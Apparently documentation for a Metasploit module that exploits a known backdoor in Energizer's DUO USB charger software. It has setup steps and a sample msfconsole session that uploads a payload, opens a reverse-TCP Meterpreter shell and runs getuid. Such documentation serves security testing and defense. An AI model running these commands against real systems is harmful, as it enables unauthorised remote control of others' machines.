2017-04-25 22:05:55 -04:00
## Vulnerable Application
2020-02-18 08:58:30 -06:00
More information can be found on the [Rapid7 Blog ](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan ).
2017-04-25 22:05:55 -04:00
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine ](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx ).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
4. Do: `set rhost`
5. Do: `set payload`
6. Do: `exploit`
## Scenarios
A run against the backdoor
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
` ``
